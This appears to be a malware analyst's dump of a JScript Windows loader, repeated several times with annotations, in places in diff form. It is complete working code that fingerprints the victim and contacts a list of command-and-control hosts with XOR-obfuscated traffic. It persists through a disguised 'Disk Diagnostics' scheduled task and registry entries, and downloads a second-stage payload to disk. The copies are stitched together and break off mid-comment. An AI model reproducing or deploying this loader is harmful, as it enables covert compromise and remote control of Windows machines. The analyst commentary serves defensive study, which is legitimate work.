  TASK_NAME : "Disk Diagnostics"                     // name of the recurring task
}
// Tiny COM factory: a ProgID table plus `new ActiveXObject(progid)`. Only the
// shell, FileSystemObject and XMLHTTP entries are requested through it.
var ObjectProducer = {}
ObjectProducer.AccesibleObjects = {
  MAIN_SH_OBJECT : 'WScript.Shell',
  STREAM_ACCESS_OBJECT : 'ADODB.Stream',
  XML_TREE_OBJECT : 'Microsoft.XMLDOM',
  XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
  HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
  FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
};
ObjectProducer.GetRootConstructor = function(){
  return ActiveXObject;
}
ObjectProducer.GetInstance = function(instanceKey){
  var rootConstructor = ObjectProducer.GetRootConstructor();
  return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
}
var DataTools = {};
DataTools.KEY_BASE = 1029;
// XOR-folds the key string into KEY_BASE and sums the decimal digits. For ASCII
// input the folded value stays in 1024..1151, so the key is a small integer
// (roughly 2..19) — brute-forceable when decoding captured traffic.
DataTools.DeriveKey = function(keyStr){
  var keyBase = DataTools.KEY_BASE;
  var key = 0;
  for(var i = 0; i < keyStr.length; i++){
    keyBase = keyBase ^ keyStr.charCodeAt(i);
  }
  var _keyBase = keyBase.toString();
  for(var i = 0; i < _keyBase.length; i++){
    key += parseInt(_keyBase.charAt(i));
  }
  return key;
}
// Single-integer XOR of every character; symmetric (encodes and decodes).
DataTools.RotString = function(str, key){
  var rotd = "";
  for(var i = 0; i < str.length; i++){
    rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
  }
  return rotd;
}
// 32-bit multiplicative hash (seed 0xdeadbeef, multiplier 2654435761), hex output.
DataTools.Hash = function(str){
  for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
    h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
  return ((h ^ h >>> 16) >>> 0).toString(16);
}
// Math.random helpers (not cryptographic): inclusive integer range, lower-case letter strings.
DataTools.Random = {};
DataTools.Random.Number = function(min, max){
  min = Math.ceil(min);
  max = Math.floor(max);
  return Math.floor(Math.random() * (max - min + 1)) + min;
}
DataTools.Random.String = function(len){
  var alphabet = "qwertyuiopasdfghjklzxcvbnm";
  var result = "";
  for(var i = 0; i < len; i++){
    var chr = DataTools.Random.Number(0, alphabet.length-1);
    result = result.concat(alphabet.charAt(chr));
  }
  return result;
}
// "k1=v1&k2=v2" templating: replaces the first `%k%` per pair; no escaping.
DataTools.Strings = {};
DataTools.Strings.ParseTemplate = function(str, templateStr){
  var template = templateStr.split('&');
  for(var i = 0; i < template.length; i++){
    var keyValue = template[i].split('=');
    str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
  }
  return str;
}
// Wrappers over WScript.Shell, Scripting.FileSystemObject and WMI.
var Windows = {};
Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
// WshShell.Run with default window style; every schtasks / wmic call goes through here.
Windows.Execute = function(command){
  Windows.CoMainObject.Run(command);
}
Windows.GetEnv = function(env){
  return Windows.CoMainObject.ExpandEnvironmentStrings(env);
}
Windows.RegRead = function(path){
  return Windows.CoMainObject.RegRead(path);
}
// All writes land under HKCU\...\Appsw64\ (GlobalStrings.REG_ROOT).
Windows.RegWrite = function(entry, value){
  Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
}
// Creates the decoy file and fills it with 1024 random letters.
Windows.CreateFile = function(path){
  var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
  fHandle.WriteLine(DataTools.Random.String(1024));
  fHandle.Close();
}
// "<path>:<stream>" targets an NTFS alternate data stream (text variant).
Windows.AppendDataStream = function(path, stream, data){
  var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
  fHandle.WriteLine(data);
  fHandle.Close();
}
// ADS, binary variant: `data` is an open ADODB.Stream; 2 = overwrite.
Windows.AppendDataStreamB = function(path, stream, data){
  data.SaveToFile(path.concat(":").concat(stream), 2);
  data.Close();
}
// Overwrites a text file (used for Disk0.js).
Windows.WriteData = function(path, data){
  var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
  fHandle.Write(data);
  fHandle.Close();
}
// Saves an open binary stream to disk (used for %temp%\<uid>.bin).
Windows.WriteBytes = function(path, data){
  data.SaveToFile(path, 2);
  data.Close();
}
// Same as AppendDataStreamB; the one Client.GetTask actually calls.
Windows.WriteDataStreamBytes = function(path, stream, data){
  data.SaveToFile(path.concat(":").concat(stream), 2);
  data.Close();
}
// Reads a whole text file; the handle is never closed.
Windows.ReadFile = function(path){
  var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
  return fHandle.ReadAll();
}
Windows.GetWMIProvider = function(pcname){
  return GetObject("winmgmts:"+
  "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
}
// Uptime in seconds via WMI; 0 on failure (which makes DeployClient quit).
Windows.GetUptime = function(){
  try{
    var wmi = Windows.GetWMIProvider(".");
    var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
    var e = new Enumerator(queryResult);
    return parseInt(e.item().SystemUpTime);
  }catch(e){
    return 0;
  }
}
// Keys off ProductName ("Windows 7" -> "32", else "64"), not the real CPU architecture.
Windows.GetArch = function(){
  var architecture = "64";
  var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
  if(product.indexOf('Windows 7') != -1){
    architecture = "32";
  }
  return architecture;
}
// Synchronous plain-HTTP GET on a reused MSXML2.XMLHTTP; "" on non-200 or any
// exception, so "no task" and "C2 unreachable" look the same to callers.
var Http = {};
Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
Http.Request = function(url){
  try{
    Http.Client.Open('GET', url, false);
    Http.Client.Send();
    if(Http.Client.Status == 200)
      return Http.Client.ResponseText;
    else
      return "";
  }catch(e){
    return ""
  }
}
// Host fingerprint, collected once at load time.
var Loader = {};
Loader.USERNAME = Windows.GetEnv("%username%");
Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
Loader.Uptime = Windows.GetUptime();
// "true" when COMPUTERNAME != USERDOMAIN — a domain-membership heuristic.
Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
// Bot id: hex hash of the fingerprint + SOFT_VERSION ("79e5036f32" for this host; cf. SetupServiceKey).
Loader.GetUid = function(){
  return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
}
// Check-in payload "user:pc:domain:machinetype:uid:sig:version:uptime", XOR'd
// with DeriveKey(nonce + C2_OB_KEY), base64'd and URL-encoded.
Loader.GetInitialRequest = function(nonce){
  var uid = Loader.GetUid();
  var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
  var sessionKey = nonce + config.C2_OB_KEY;
  request = request.join(":");
  request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
  request = Base64Encode(request);
  return encodeURIComponent(request);
}
// Check-in path under /rpc.aspx. NOTE(review): "®clid" in the literal is very
// likely a paste rendering artifact ("&reg" -> "®"); the live parameter is
// presumably "&regclid=". Kept as dumped — verify against traffic before use.
Loader.GetInitialEndpoint = function(){
  var nonce = DataTools.Random.String(12)
  var request = Loader.GetInitialRequest(nonce);
  var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
  return endpoint;
}
// Fetches the "plugin host" from <SELECTED_C2>/go.aspx?... (rtag = 32|64),
// XOR-decodes it with DeriveKey(uid + C2_OB_KEY), base64-decodes it and drops
// it as %temp%\<uid>.bin. Written even if the request failed (empty body).
Loader.DeployHost = function(){
  var temp = Windows.GetEnv("%temp%");
  var architecture = Windows.GetArch();
  var nonce = DataTools.Random.String(12);
  var uid = Loader.GetUid();
  var sessionKey = nonce + config.C2_OB_KEY;
  var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
  encodedId = Base64Encode(encodedId);
  encodedId = encodeURIComponent(encodedId);
  var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
  pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
  var filename = uid.concat(".bin");
  Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
  return temp.concat("\\").concat(filename);
}
// Initial check-in: quits when uptime <= 3000 s (or WMI failed), polls the 8
// hosts up to 20 times with 21 s sleeps, and on a "<<<CLIENT__<base64>" reply
// records ShimV4 / SetupServiceKey in HKCU and hands the decoded client script
// to Persist(). Exceptions are swallowed.
Loader.DeployClient = function() {
  if (Loader.Uptime <= 3000) {
    WScript.Quit(0);
  }
  for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
    for (var j = 0; j < config.PRIMARY_C2.length; j++) {
      try {
        var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
        response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
        if (response.indexOf('<<<CLIENT__') !== -1) {
          var client = response.replace('<<<CLIENT__', '');
          client = Base64text(client);
          Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
          Windows.RegWrite("SetupServiceKey", Loader.GetUid());
          SELECTED_C2 = config.PRIMARY_C2[j];
          Loader.Persist(client);
          return;
        }
      } catch (e) {
      }
      WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
    }
  }
}
// Persistence: 6-minute "Disk Diagnostics" task running explorer.exe Disk0.js;
// ServerUrl <- client script; WebLib32 <- this file's own text; decoy
// diskdiag.ini; Disk0.js on disk; then the plugin-host download.
Loader.Persist = function(client){
  var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
  var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
  Windows.Execute(taskCommand);
  Windows.RegWrite("ServerUrl", client);
  Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
  Windows.CreateFile(GlobalStrings.NTFILE_PATH);
  Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
  Loader.DeployHost();
}
// Leftover debugging aid (modal Popup); not called anywhere in this dump.
function debug(message){
  ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
}
// base64 -> UTF-8 text (used to unwrap the client script at check-in).
function Base64text(string){
  var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
  var element = XmlDOM.createElement("tempContainer");
  element.dataType = "bin.Base64";
  element.text = string;
  var stream = WScript.CreateObject("ADODB.Stream");
  stream.Type = 1;
  stream.Open();
  stream.Write(element.nodeTypedValue);
  stream.Position = 0;
  stream.Type = 2;
  stream.CharSet = "utf-8";
  return stream.ReadText();
}
// string -> byte array via an ADODB.Stream text/binary round-trip ("ascii").
function StringToBinary(string){
  var BinaryStream = new ActiveXObject("ADODB.Stream");
  BinaryStream.Type = 2;
  BinaryStream.CharSet = "ascii";
  BinaryStream.Open();
  BinaryStream.WriteText(string);
  BinaryStream.Position = 0;
  BinaryStream.Type = 1;
  BinaryStream.Position = 0;
  return BinaryStream.Read();
}
// base64 -> open binary ADODB.Stream; the caller saves and closes it.
function Base64bytes(string){
  var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  var element = XmlDOM.createElement("Base64Data");
  element.dataType = "bin.base64";
  element.text = string;
  var stream = WScript.CreateObject("ADODB.Stream");
  stream.Type = 1;
  stream.Open();
  stream.Write(element.nodeTypedValue);
  return stream;
}
// string -> base64; strips line breaks and also every "//" (corrupts such encodings).
function Base64Encode(string) {
  var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  var element = XmlDOM.createElement("Base64Data");
  element.dataType = "bin.base64";
  element.nodeTypedValue = StringToBinary(string);
  return element.text.replace(/\n/g, "").replace(/\/\//g, "");
}
// Standalone run (CLIENT_IMPORT_ENV undefined) -> loader path; eval'd from the
// client (which defines CLIENT_IMPORT_ENV) -> helpers only.
if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
  Loader.DeployClient();
}
// NOTE(review): third verbatim copy of the WebLib32 library script; the page is
// truncated part-way through it (Loader.GetInitialRequest). Presumably a dump /
// paste artifact — confirm against the original hive.
var config = {
  PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  SOFT_SIG : 'mad29',          // build/campaign tag
  SOFT_VERSION: 32,            // appended to the bot id
  C2_REQUEST_SLEEP : 21,       // seconds between hosts in DeployClient()
  C2_FAIL_SLEEP : 21,          // not read anywhere in this script
  C2_FAIL_COUNT : 20,          // full passes over PRIMARY_C2
  C2_OB_KEY : 'JxTRG4mY',      // static secret folded into every XOR key
  C2_PREFIX : 'rpc.aspx'       // check-in endpoint path
}
var SELECTED_C2 = config.PRIMARY_C2[0];
// Polyfill for Math.imul (missing in legacy JScript); required by DataTools.Hash.
Math.imul = function (a, b) {
  var ah = (a >>> 16) & 0xffff;
  var al = a & 0xffff;
  var bh = (b >>> 16) & 0xffff;
  var bl = b & 0xffff;
  return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
};
// Host-side constants; every entry is a concrete indicator for this sample.
var GlobalStrings = {
  REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
  WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
  WMIC_EXEC : "wmic process call create \"%path%\"",
  TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
  TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
  NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",   // decoy file carrying ADS payloads
  ADS_SSID : "HDDScan",                              // not referenced anywhere in this dump
  PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
  TASK_NAME : "Disk Diagnostics"
}
// Tiny COM factory: ProgID table plus `new ActiveXObject(progid)`.
var ObjectProducer = {}
ObjectProducer.AccesibleObjects = {
  MAIN_SH_OBJECT : 'WScript.Shell',
  STREAM_ACCESS_OBJECT : 'ADODB.Stream',
  XML_TREE_OBJECT : 'Microsoft.XMLDOM',
  XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
  HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
  FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
};
ObjectProducer.GetRootConstructor = function(){
  return ActiveXObject;
}
ObjectProducer.GetInstance = function(instanceKey){
  var rootConstructor = ObjectProducer.GetRootConstructor();
  return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
}
var DataTools = {};
DataTools.KEY_BASE = 1029;
// XOR-folds the key string into KEY_BASE and sums the decimal digits; yields a
// small integer (roughly 2..19 for ASCII input) — trivially brute-forceable.
DataTools.DeriveKey = function(keyStr){
  var keyBase = DataTools.KEY_BASE;
  var key = 0;
  for(var i = 0; i < keyStr.length; i++){
    keyBase = keyBase ^ keyStr.charCodeAt(i);
  }
  var _keyBase = keyBase.toString();
  for(var i = 0; i < _keyBase.length; i++){
    key += parseInt(_keyBase.charAt(i));
  }
  return key;
}
// Single-integer XOR of every character; symmetric.
DataTools.RotString = function(str, key){
  var rotd = "";
  for(var i = 0; i < str.length; i++){
    rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
  }
  return rotd;
}
// 32-bit multiplicative hash (seed 0xdeadbeef, multiplier 2654435761), hex output.
DataTools.Hash = function(str){
  for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
    h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
  return ((h ^ h >>> 16) >>> 0).toString(16);
}
// Math.random helpers (not cryptographic).
DataTools.Random = {};
DataTools.Random.Number = function(min, max){
  min = Math.ceil(min);
  max = Math.floor(max);
  return Math.floor(Math.random() * (max - min + 1)) + min;
}
DataTools.Random.String = function(len){
  var alphabet = "qwertyuiopasdfghjklzxcvbnm";
  var result = "";
  for(var i = 0; i < len; i++){
    var chr = DataTools.Random.Number(0, alphabet.length-1);
    result = result.concat(alphabet.charAt(chr));
  }
  return result;
}
// "k1=v1&k2=v2" templating: first `%k%` per pair is replaced; no escaping.
DataTools.Strings = {};
DataTools.Strings.ParseTemplate = function(str, templateStr){
  var template = templateStr.split('&');
  for(var i = 0; i < template.length; i++){
    var keyValue = template[i].split('=');
    str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
  }
  return str;
}
// Wrappers over WScript.Shell, Scripting.FileSystemObject and WMI.
var Windows = {};
Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
// WshShell.Run; every schtasks / wmic call goes through here.
Windows.Execute = function(command){
  Windows.CoMainObject.Run(command);
}
Windows.GetEnv = function(env){
  return Windows.CoMainObject.ExpandEnvironmentStrings(env);
}
Windows.RegRead = function(path){
  return Windows.CoMainObject.RegRead(path);
}
// All writes land under HKCU\...\Appsw64\ (GlobalStrings.REG_ROOT).
Windows.RegWrite = function(entry, value){
  Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
}
// Decoy file filled with 1024 random letters.
Windows.CreateFile = function(path){
  var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
  fHandle.WriteLine(DataTools.Random.String(1024));
  fHandle.Close();
}
// "<path>:<stream>" = NTFS alternate data stream (text variant).
Windows.AppendDataStream = function(path, stream, data){
  var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
  fHandle.WriteLine(data);
  fHandle.Close();
}
// ADS, binary variant (open ADODB.Stream; 2 = overwrite).
Windows.AppendDataStreamB = function(path, stream, data){
  data.SaveToFile(path.concat(":").concat(stream), 2);
  data.Close();
}
Windows.WriteData = function(path, data){
  var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
  fHandle.Write(data);
  fHandle.Close();
}
Windows.WriteBytes = function(path, data){
  data.SaveToFile(path, 2);
  data.Close();
}
// Same as AppendDataStreamB; used by Client.GetTask.
Windows.WriteDataStreamBytes = function(path, stream, data){
  data.SaveToFile(path.concat(":").concat(stream), 2);
  data.Close();
}
// Reads a whole text file; the handle is never closed.
Windows.ReadFile = function(path){
  var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
  return fHandle.ReadAll();
}
Windows.GetWMIProvider = function(pcname){
  return GetObject("winmgmts:"+
  "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
}
// Uptime in seconds via WMI; 0 on failure.
Windows.GetUptime = function(){
  try{
    var wmi = Windows.GetWMIProvider(".");
    var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
    var e = new Enumerator(queryResult);
    return parseInt(e.item().SystemUpTime);
  }catch(e){
    return 0;
  }
}
// Keys off ProductName ("Windows 7" -> "32", else "64"), not the real CPU architecture.
Windows.GetArch = function(){
  var architecture = "64";
  var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
  if(product.indexOf('Windows 7') != -1){
    architecture = "32";
  }
  return architecture;
}
- // Single shared MSXML2.XMLHTTP instance doing synchronous GETs. Returns the response
- // body on HTTP 200 and "" on any other status or exception, so callers cannot tell a
- // failed request from an empty reply. All C2 traffic is plain http:// per config.
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- // Victim fingerprint collected at load time from environment variables and WMI.
- // MachineType is "true" when COMPUTERNAME differs from USERDOMAIN, i.e. the host is
- // probably domain-joined (workgroup machines report their own name as USERDOMAIN).
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- // GetUid: per-victim ID = Hash(username+pc+domain+machinetype+version+sig) + version.
- // Deterministic, so the same user on the same host always gets the same ID; it is also
- // the key material for decoding C2 replies and the name of the dropped %temp% file.
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- // GetInitialRequest: colon-joined fingerprint, XOR-obfuscated with a key derived from
- // nonce + C2_OB_KEY, then base64 and URL-encoded. The nonce is sent in the same URL
- // (ubwG=), so the whole check-in is decodable from a proxy log with the static key.
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- // GetInitialEndpoint: check-in path under C2_PREFIX with decoy parameters (client=,
- // service_id=). NOTE(review): "®clid" is presumably an HTML-entity rendering artifact
- // of "&regclid" on this paste -- confirm against a live sample before writing rules.
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- // DeployHost: fetches a second payload from SELECTED_C2 (/go.aspx, rtag = GetArch()),
- // XOR-decodes it with DeriveKey(uid + C2_OB_KEY), base64-decodes it and writes the bytes
- // to %temp%\<uid>.bin. Returns that path; nothing in this script executes the file.
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- // DeployClient: main check-in loop. Exits silently when system uptime <= 3000 s
- // (~50 min), which looks like a sandbox/analysis-VM check (inference). Then tries every
- // PRIMARY_C2 host for up to C2_FAIL_COUNT rounds, sleeping C2_REQUEST_SLEEP s after each
- // attempt. A reply that, after XOR decoding, contains "<<<CLIENT__" is base64-decoded into
- // a script and handed to Persist; the answering host and the UID are stored in HKCU
- // (ShimV4, SetupServiceKey). Exceptions are swallowed; any other reply is just retried.
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- // Persist: (1) creates the "Disk Diagnostics" scheduled task that runs PERSIST_COMMAND
- // every 6 minutes; (2) stores the received script in the ServerUrl value and a copy of
- // THIS script (its own file) in WebLib32, both under HKCU; (3) drops the decoy
- // diskdiag.ini; (4) writes the received script to C:\Users\Public\Disk0.js; (5) pulls
- // the second payload via DeployHost. Hunting points: schtasks.exe spawned by the script
- // host, explorer.exe launching a .js from C:\Users\Public, and the REG_ROOT key.
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- // Developer leftover: shows a WScript.Shell popup. Not called anywhere in this script.
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- // Base64 -> bytes via the MSXML bin.Base64 dataType, then the bytes are re-read from an
- // ADODB.Stream as UTF-8 text. Used to turn the C2 reply into the second-stage script.
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- // Text -> raw ASCII bytes through an ADODB.Stream (write as text, re-read as binary).
- // Only used by Base64Encode; non-ASCII characters are subject to the "ascii" charset.
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- // Base64 -> an open binary ADODB.Stream holding the decoded bytes. The caller
- // (Windows.WriteBytes) is responsible for SaveToFile and Close.
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- // ASCII bytes of string -> base64 text via MSXML. Strips the newlines MSXML inserts and
- // ALSO every "//" sequence, which silently corrupts any encoding that contains one.
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- // Entry point. Runs the check-in only when CLIENT_IMPORT_ENV is undefined, i.e. when the
- // file is executed directly rather than eval'd by a host that defines that flag
- // (presumably the embedding loader that reads this script back from the registry -- TODO confirm).
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- // Loader configuration (analyst notes). PRIMARY_C2 is the ordered list of hosts tried by
- // Loader.DeployClient; SOFT_SIG / SOFT_VERSION are campaign and build tags that also feed
- // the per-victim UID; C2_OB_KEY seeds the XOR key for every request and reply
- // (DataTools.DeriveKey); C2_PREFIX is the check-in path. Sleep values are seconds.
- // NOTE(review): C2_FAIL_SLEEP is never read by the code in this script.
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- // Active C2; starts as the first entry and is replaced by whichever host answers.
- var SELECTED_C2 = config.PRIMARY_C2[0];
- // Unconditional replacement for Math.imul (32-bit integer multiply) for script hosts that
